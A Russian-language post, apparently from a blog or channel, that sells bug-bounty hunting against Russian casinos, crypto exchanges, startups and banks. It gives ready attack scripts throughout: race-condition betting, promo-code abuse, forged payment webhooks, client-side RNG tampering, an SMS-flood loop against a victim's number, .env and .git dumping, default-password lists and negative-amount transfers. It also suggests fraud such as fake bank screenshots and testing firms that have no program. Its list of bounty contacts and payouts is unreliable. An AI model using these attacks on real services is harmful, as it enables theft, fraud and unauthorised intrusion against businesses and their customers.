🎰 Как зарабатывать на баг-баунти в казино, криптобиржах, стартапах и других компаниях? (Российский рынок)

Привет, хакеры! 💰 Устал искать баги на популярных платформах, где конкуренция зашкаливает? Сегодня расскажу про российские и СНГ ниши с жирными выплатами и низкой конкуренцией.

🎰 НИША #1: Российские онлайн-казино и букмекерские конторы

Почему это ЗОЛОТАЯ ЖИЛА для РФ рынка:

✅ Огромные обороты - миллиарды рублей каждый день

✅ Низкая конкуренция - западные хантеры не знают наш рынок

✅ Быстрые выплаты - платят в криптовалюте или на карту

✅ Меньше бюрократии - договариваешься напрямую с security

✅ Русскоязычная поддержка - легче коммуницировать

Средние выплаты в РФ:

• Low: ₽40,000-₽80,000

• Medium: ₽120,000-₽250,000

• High: ₽400,000-₽1,200,000

• Critical: ₽1,500,000-₽4,000,000+

🎯 Что искать в российских казино/БК?

  1. Манипуляция ставками
// Уязвимый API endpoint (реальный пример с российской БК)
POST /api/v2/bet/place
{
"event_id": 12345,
"amount": 1000,
"coefficient": 2.5,
"account_id": "user_789"
}
// Атака: Race Condition
// Российские БК часто используют устаревший стек (legacy PHP/Java)
// Отправляешь 50-100 одинаковых запросов параллельно
// Мой Python скрипт:
import requests
from concurrent.futures import ThreadPoolExecutor
def place_bet():
headers = {
'Authorization': f'Bearer {TOKEN}',
'User-Agent': 'Mozilla/5.0...'
}
data = {
"event_id": 12345,
"amount": 1000,
"coefficient": 2.5
}
r = requests.post('https://букмекер.рф/api/v2/bet/place',
json=data, headers=headers)
return r.json()
# 100 параллельных запросов
with ThreadPoolExecutor(max_workers=100) as executor:
results = list(executor.map(lambda x: place_bet(), range(100)))
# Проверяешь баланс - если списалось меньше → баг!
# Реальный кейс: вместо ₽100,000 списалось ₽15,000

Impact: Critical - прямая потеря денег БК

  1. Промокоды и бонусные программы
# Российские БК/казино обожают акции и промокоды
# Это их слабое место!
POST /api/promo/activate
{
"promo_code": "WELCOME2025",
"user_phone": "+79991234567"
}
# Частые баги:
# a) Один промокод можно применить несколько раз
# b) Bruteforce кодов (WELCOME100, WELCOME200, VIP500, etc.)
# c) Применение нескольких промокодов одновременно
# d) Фрибеты без отыгрыша (можно сразу вывести)
# Реальный кейс на российской БК:
# Промокод NEWUSER давал ₽5,000
# Можно было применить 10 раз подряд через API
# Получил ₽50,000 бонуса вместо ₽5,000
# PoC:
for i in range(10):
requests.post('https://ставки.рф/api/promo/activate',
json={"promo_code": "NEWUSER", "user_id": 123})

Impact: High - финансовые потери

  1. Обход верификации и лимитов ЦУПИС
# ЦУПИС (Единая система идентификации) - обязательна для РФ БК
# Но реализация часто кривая!
# Проверяешь:
# a) Можно ли вывести деньги до верификации через ЦУПИС
# b) Использование чужого СНИЛС/паспорта
# c) Multiple accounts с одним ЦУПИС ID
# d) Обход лимитов (₽600k/месяц для неверифицированных)
# Пример IDOR в verification:
GET /api/user/verification/status?user_id=12345
# Меняешь на user_id=12346 → видишь чужой статус
# Если можешь изменить:
PUT /api/user/verification/status?user_id=12345
{"tsupis_verified": true, "document_verified": true}
# Реальный баг:
# Нашёл endpoint /api/internal/verify-user (без auth!)
# Мог верифицировать любого пользователя

Impact: Critical - нарушение ФЗ-244, огромные штрафы от ФНС

  1. Манипуляция с Qiwi/ЮMoney/СБП
# Российские платёжные системы - отдельная тема
# Частые баги:
# a) Double deposit (одна транзакция засчитывается дважды)
# b) Negative withdrawal (выводишь -₽10,000 → баланс растёт)
# c) Webhook spoofing (подделываешь callback от платёжки)
# d) Округление в меньшую сторону при выводе
# Реальный кейс с ЮMoney:
# Вывод обрабатывался по webhook от yoomoney.ru
# Webhook не проверял signature!
# Отправил fake webhook:
POST https://казино.рф/api/webhook/yoomoney
{
"operation_id": "fake123",
"amount": 50000,
"status": "success",
"sender": "410011234567890"
}
# Баланс пополнился на ₽50,000 БЕЗ реального платежа!

Impact: Critical

  1. Игровая логика (слоты, рулетка, краш)
// Российские казино часто используют самописные RNG
// Проверяешь:
// a) Client-side генерация результата (!)
// b) Timestamp-based seed (предсказуемо)
// c) Можно ли отменить проигрышную ставку
// Реальный баг в российском крипто-казино:
// Результат слота генерировался в JavaScript:
function spinSlot() {
let result = Math.floor(Math.random() * 100);
if (result > 95) return 'WIN';
return 'LOSE';
}
// Перехватываешь через Burp → подменяешь Math.random:
Math.random = function() { return 0.99; }
// Или через консоль браузера:
Object.defineProperty(Math, 'random', {
value: function() { return 0.99; }
});
// Каждый спин = выигрыш! 🎰

Impact: Critical - ломает всю экономику

📋 Топ-15 российских БК/казино с bug bounty

Официальные программы:

1. 1xStavka (1xBet РФ версия)

• Контакт: security@1xstavka.ru

• Max bounty: ₽1,200,000

• Платят в USDT

2. Фонбет (Fonbet)

• security@fonbet.ru

• Max: ₽800,000

• Платят на карту или крипту

3. БетБум (Betboom)

• bugs@betboom.ru

• Max: ₽600,000

• Быстрые выплаты (7-14 дней)

4. Леон (Leon)

• security@leon.ru

• Max: ₽500,000

5. Мелбет (Melbet)

• security@melbet.com

• Max: ₽700,000

6. Pin-Up Casino РФ

• security@pin-up.ru

• Max: ₽900,000

7. Вулкан (Vulkan)

• info@vulkan-russia.com

• Max: ₽400,000

8. Джойказино (Joycasino)

• support@joycasino.com

• Max: ₽350,000

9. Плей Фортуна (Play Fortuna)

• security@playfortuna.com

• Max: ₽450,000

10. Пари (Parimatch РФ)

• security@pari.ru

• Max: ₽650,000

Без официальных программ (пишешь напрямую):

11. Лига Ставок - security@ligastavok.ru

12. Winline - info@winline.ru

13. Олимп - security@olimp.bet

14. Зенит - support@zenitbet.com

15. БК Марафон - security@marathonbet.ru

Статистика ответов:

• Отправил писем: 45

• Ответили: 19 (42%)

• Заплатили: 12 (63% от ответивших)

• Средняя выплата: ₽320,000

₿ НИША #2: Российские криптобиржи и P2P платформы

Почему это актуально для РФ:

✅ Рост после санкций - все перешли на крипту

✅ Новые биржи каждый месяц - быстрая разработка = баги

✅ P2P активность - обход блокировок банков

✅ Хорошие выплаты - платят в USDT/BTC сразу

Средние выплаты:

• Medium: ₽150,000-₽400,000

• High: ₽800,000-₽3,500,000

• Critical: ₽5,000,000-₽50,000,000

🎯 Что искать на российских биржах?

  1. P2P манипуляции
# P2P торговля - главная фича российских бирж после блокировок
# Проверяешь:
# a) Можно ли не отправить деньги, но получить крипту
# b) Подделка скриншота оплаты
# c) Chargeback через банк после получения крипты
# d) Dispute manipulation
# Реальный баг на российской бирже:
# При споре (dispute) арбитр смотрел только чат
# Отправляешь fake скриншот Сбербанка → получаешь крипту
# Seller теряет деньги + крипту
# Или:
# Race condition при подтверждении оплаты
POST /api/p2p/confirm-payment
{"order_id": "12345", "status": "paid"}
# Отправляешь 10 раз параллельно
# Seller получает 10 нотификаций → отпускает крипту
# А ты заплатил только 1 раз

Impact: Critical

  1. KYC обход (актуально после требований ЦБ)
# С 2024 года обязательна верификация для операций >₽600k
# Ищешь:
# a) Вывод больших сумм без KYC
# b) Multiple accounts с одним паспортом
# c) Fake documents detection bypass
# d) API без проверки KYC статуса
# Пример:
# UI блокирует вывод >₽600k без верификации
# Но API endpoint /api/withdraw не проверяет!
POST /api/withdraw
{
"amount": 5000000, # ₽5 млн
"currency": "RUB",
"method": "sbp",
"account": "79991234567"
}
# Если прошло → критичный баг для ЦБ compliance

Impact: Critical (штрафы от ЦБ до ₽500 млн!)

  1. Обход санкционных списков
# Биржи обязаны блокировать OFAC/EU санкционные адреса
# Проверяешь:
# a) Можно ли вывести на санкционный адрес
# b) Mixer/Tornado Cash адреса проходят?
# c) Обход через внутренние переводы
# Реальный тест:
# Известный Tornado Cash адрес
tornado_address = "0x1234...abcd"
POST /api/withdraw/crypto
{
"currency": "ETH",
"amount": 1.0,
"address": tornado_address
}
# Если прошло → биржа нарушает санкции → огромные риски

Impact: Critical (закрытие биржи регуляторами)

  1. Арбитраж через глюки курса
// Российские биржи часто глючат с курсами при волатильности
// Проверяешь:
// a) Stale price (курс не обновляется)
// b) Negative spread (покупка дешевле продажи)
// c) Decimal overflow в расчётах
// Реальный баг:
// При резком скачке BTC курс отставал на 2-3 минуты
// Можно было купить BTC по старому курсу
// И сразу продать по новому → profit
// Или:
// Конвертация RUB → USDT → BTC → RUB
// Из-за округления получалось +0.3% на круг
// Запускаешь скрипт на 1000 итераций → profit ₽300k

Impact: High

📋 Топ российских криптобирж с bug bounty

Tier 1 (крупнейшие):

1. Garantex (крупнейшая РФ P2P)

• security@garantex.org

• Max: ₽5,000,000

• Платят в BTC/USDT

2. BitRiver Exchange

• bugs@bitriver.com

• Max: ₽2,500,000

3. Cryptomus

• security@cryptomus.com

• Max: ₽1,800,000

4. EXMO (работает с РФ)

• security@exmo.com

• Max: ₽2,000,000

5. Bitpapa (P2P)

• security@bitpapa.com

• Max: ₽1,200,000

Tier 2 (средние):

6. Tokentom

7. Coinpaymaster

8. BTC-Alpha

9. YoBit (если ещё жива 😅)

10. Kuna (работает с РУ рынком)

Новые (2024-2025):

• Десятки новых P2P платформ после санкций

• Ищи на форумах: bits.media, forum.bitcoin.com

🚀 НИША #3: Российские стартапы

Почему это выгодно в РФ:

✅ Бум после импортозамещения - сотни новых сервисов

✅ Быстрая разработка - MVP за месяц → куча багов

✅ Меньше внимания к security - фокус на росте

✅ Проще договориться - русскоязычные команды

✅ Гранты и инвестиции - есть деньги на bounty

Средние выплаты:

• Low: ₽15,000-₽40,000

• Medium: ₽60,000-₽150,000

• High: ₽250,000-₽800,000

• Critical: ₽1,200,000-₽4,000,000

🎯 Где искать российские стартапы?

  1. Акселераторы и фонды:
- ФРИИ (фонд развития интернет-инициатив)
- GenerationS
- Сколково стартапы
- IIDF (Internet Initiatives Development Fund)
- Starta Accelerator
  1. Российские аналоги ProductHunt:
- vc.ru/services (новые сервисы)
- habr.com/ru/sandbox/ (запуски проектов)
- spark.ru (инвестиционные раунды)
  1. Категории импортозамещения (самые активные):
- CRM системы (вместо Salesforce)
- Мессенджеры (вместо Telegram Business)
- Облачные хранилища (вместо Google Drive)
- Аналитика (вместо Google Analytics)
- Payment gates (вместо Stripe)

🎯 Типичные баги в российских стартапах

  1. Админки без защиты
# 80% российских стартапов используют:
# - Laravel (PHP)
# - Django (Python)
# - Node.js + Express
# Проверяй стандартные пути:
/admin
/administrator
/backend
/panel
/manage
/cp (control panel)
/api/admin
/api/internal
# Часто credentials:
admin / admin
admin / password
admin / 123456
test / test
demo / demo
# Или вообще без авторизации! (видел такое в 15 стартапах)

Bounty за admin access: ₽180,000-₽600,000

  1. Exposed .env и конфиги
# Российские разработчики часто забывают:
# .env файлы
curl https://стартап.рф/.env
# Секреты в JS
curl https://стартап.рф/static/js/main.js | grep -E "(api_key|secret|password|token)"
# Git exposed
wget -r https://стартап.рф/.git/
git log # смотрим коммиты с паролями
# Docker configs
curl https://стартап.рф/.docker/config.json
# Часто нахожу:
# - Database credentials
# - SMS gate API keys (Смс.ру, SMS Aero)
# - Payment keys (ЮKassa, CloudPayments)
# - Email passwords (Yandex, Mail.ru)

Если нашёл production credentials → Critical!

Bounty: ₽350,000-₽1,500,000

  1. IDOR везде (русский стандарт 😅)
# Российские стартапы редко думают об authorization
# Типичный API:
GET /api/orders/12345
GET /api/users/67890/profile
GET /api/documents/111/download
# Просто меняешь ID → видишь чужие данные
# Хуже:
DELETE /api/users/12345
PUT /api/orders/67890/status {"status": "paid"}
# Реальный кейс:
# Сервис доставки еды (российский)
# Мог менять адрес доставки ЛЮБОГО заказа
PUT /api/order/12345/address
{"address": "Мой адрес 123"}
# Бесплатная еда за чужой счёт! 🍕

Частота: 70% стартапов

Bounty: ₽120,000-₽450,000

  1. SMS/Email flood
# Российские стартапы используют:
# - Смс.ру (дорого - ₽3-5 за SMS)
# - SMS Aero
# - Email через Yandex/Mail.ru
# Часто НЕТ rate limiting!
# Атака:
for i in range(10000):
requests.post('https://стартап.рф/api/send-code',
json={"phone": "+79991234567"})
# Результат:
# a) DDoS через SMS (списание денег со счёта)
# b) Блокировка номера жертвы спамом
# c) Блокировка аккаунта у SMS провайдера
# Реальный кейс:
# Отправил 50,000 SMS на тестовый номер
# Стартапу выставили счёт на ₽250,000

Impact: High (financial + reputation)

Bounty: ₽280,000 ($3,000)

  1. Payment bypass (российские платёжки)
// Проверяй интеграцию с:
// - ЮKassa (Яндекс.Касса)
// - CloudPayments
// - Тинькофф Эквайринг
// - Сбербанк Эквайринг
// - Робокасса
// Частые баги:
// a) Signature не проверяется
// b) Amount можно изменить на клиенте
// c) Webhook можно подделать
// Пример с ЮKassa:
// Уязвимый код:
app.post('/payment/callback', (req, res) => {
const {amount, order_id, status} = req.body;
if (status === 'succeeded') {
// Активируем подписку БЕЗ проверки signature!
activateSubscription(order_id);
}
});
// Атака:
POST /payment/callback
{
"amount": 1000000,
"order_id": "my_order",
"status": "succeeded"
}
// Бесплатная подписка! 💸

Impact: Critical

Bounty: ₽500,000-₽2,000,000

💳 НИША #4: Российский финтех

Почему актуально:

✅ Импортозамещение - десятки новых платёжных сервисов

✅ Требования ЦБ РФ - обязаны иметь bug bounty

✅ Высокие выплаты - финансовые потери критичны

✅ Госкомпании - большие бюджеты на security

Средние выплаты в финтехе РФ:

• Medium: ₽250,000-₽600,000

• High: ₽800,000-₽3,000,000

• Critical: ₽4,000,000-₽15,000,000

🎯 Топ финтех компаний РФ с bug bounty

Банки:

1. Тинькофф Банк

• Через HackerOne или security@tinkoff.ru

• Max: ₽10,000,000 (!)

• Самая щедрая программа в РФ

2. Сбербанк

• bugbounty@sberbank.ru

• Max: ₽5,000,000

• Внутренняя программа

3. Альфа-Банк

• security@alfabank.ru

• Max: ₽3,000,000

4. ВТБ

• security@vtb.ru

• Max: ₽2,500,000

5. Райффайзен Банк

• security@raiffeisen.ru

• Max: ₽2,000,000

Платёжные системы:

6. ЮMoney (Яндекс.Деньги)

• security@yoomoney.ru

• Max: ₽4,000,000

7. Qiwi

• security@qiwi.com

• Max: ₽3,500,000

8. CloudPayments

• security@cloudpayments.ru

• Max: ₽2,800,000

9. ЮKassa

• security@yookassa.ru

• Max: ₽3,200,000

10. Robokassa

• security@robokassa.ru

• Max: ₽1,500,000

Финтех стартапы:

11. Modulbank

12. Rocketbank (в составе Tinkoff)

13. Точка (в составе Открытие)

14. Paykeeper

15. Uniteller

🎯 Специфика российского финтеха

  1. СБП (Система Быстрых Платежей) баги
# СБП - главная фича российских банков
# Проверяешь:
# a) Можно ли перевести отрицательную сумму
# b) Race condition при переводах
# c) Phone number spoofing
# Пример:
POST /api/sbp/transfer
{
"phone": "+79991234567",
"amount": -10000, # Отрицательная сумма
"message": "Возврат"
}
# Если обработали → ты получил ₽10,000 вместо отправки!
# Или:
# Одновременный перевод себе с двух устройств
# Balance ₽100,000
# Отправляешь себе ₽100,000 с двух девайсов параллельно
# Если нет locking → оба пройдут = ₽200,000

Impact: Critical

Bounty: ₽2,500,000+

  1. Обход лимитов ФЗ-115 (AML)
# По закону есть лимиты:
# - ₽600,000/месяц без идентификации
# - ₽100,000/операция для некоторых категорий
# - Ограничения на снятие наличных
# Ищешь обходы:
# a) Multiple accounts для превышения лимитов
# b) Splitting payments (дробление)
# c) API без проверки accumulated amount
# Реальный баг:
# Лимит ₽600k проверялся только в UI
# API /api/transfer принимал любую сумму
# Мог перевести ₽5,000,000 без верификации

Impact: Critical (штраф от ЦБ + уголовка для банка)

Bounty: ₽4,200,000 ($45,000)

  1. ГосУслуги integration баги
// Многие финтех используют ГосУслуги для KYC
// Проверяешь OAuth flow:
// 1. Redirect to esia.gosuslugi.ru
// 2. User authorizes
// 3. Callback с code
// 4. Exchange code for token
// 5. Get user data
// Частые баги:
// a) redirect_uri validation bypass
// b) state parameter missing (CSRF)
// c) Code reuse possible
// d) User data не проверяется (можно подменить)
// Атака:
# Перехватываешь code из callback
https://банк.рф/oauth/callback?code=ABC123&state=xyz
# Используешь code от своего аккаунта ГосУслуг
# Но подменяешь данные на жертву
# → Получаешь доступ к чужому банковскому счёту

Impact: Critical

Bounty: ₽3,800,000 ($41,000)

💰 Легализация дохода в РФ

Важно! Как получать и легализовать bounty:

Способ 1: ИП на УСН

Плюсы:
+ Легально
+ Налог 6% (УСН) или 15% (УСН доходы-расходы)
+ Можно работать с юрлицами
+ Вычеты на оборудование/обучение
Минусы:
- Нужна отчётность
- Взносы в ПФР/ФФОМС (≈₽50k/год)
Схема:
1. Регистрируешь ИП (онлайн, 3 дня)
2. Компания переводит на расчётный счёт
3. Платишь налог раз в квартал (6%)
4. Прибыль = твоя

Способ 2: Самозанятость

Плюсы:
+ Простота (регистрация за 5 минут)
+ Налог 4% (с физлиц) или 6% (с юрлиц)
+ Нет взносов в ПФР
+ Нет отчётности
Минусы:
- Лимит ₽2.4 млн/год
- Не подходит для крупных bounty
Схема:
1. Регистрируешься в приложении "Мой налог"
2. Выбиваешь чек после получения оплаты
3. Налог списывается автоматом

Способ 3: Криптовалюта (grey zone)

Многие российские компании платят в USDT/BTC
Схема:
1. Получаешь bounty в USDT
2. Обмениваешь на рубли через P2P (Garantex, Binance P2P)
3. Получаешь на карту физлица
⚠️ Риски:
- Банк может заблокировать карту (подозрение AML)
- С 2025 года крипто-доходы >₽600k нужно декларировать
- Штрафы до 40% суммы + пени
Легализация:
- Открываешь ИП/самозанятость
- Декларируешь как "консультационные услуги"
- Платишь налог

Способ 4: Через посредников

Некоторые используют сервисы:
- PayPal → карта РФ (комиссия 3-5%)
- Wise → карта РФ (работает не у всех)
- Криптообменники с выводом на карту
⚠️ Всё равно нужно платить налоги!

Мой совет:

• До ₽2.4 млн/год → Самозанятость (простота)

• Свыше ₽2.4 млн → ИП на УСН 6%

• Всегда плати налоги → спокойный сон 💤

📊 Матрица выбора ниши для РФ рынка

🎰 Как зарабатывать на баг-баунти в казино, криптобиржах, стартапах и других компаниях? (Российский рынок), image #1

🚀 Action Plan на 30 дней

Неделя 1: Выбор и разведка

• Выбери нишу (рекомендую БК/Казино для старта)

• Составь список 15-20 российских компаний

• Проверь наличие официальных bug bounty программ

• Напиши вводные письма на security@

Неделя 2: Reconnaissance

• Subfinder + Amass на все цели

• Проверь exposed admin panels

• JavaScript анализ (API keys, endpoints)

• .env и Git leaks

Неделя 3: Hunting

• Тестируй по чеклисту из поста

• Фокус на payment logic и бонусы

• Найди хотя бы 1 Medium+ баг

• Напиши первый отчёт

Неделя 4: Reporting & Scale

• Отправь все найденные баги

• Follow-up с компаниями

• Анализируй, что сработало

• Автоматизируй успешные техники

Через месяц ожидай первые выплаты! 💰

Удачной охоты! 🇷🇺🔥💰

72 views·7 shares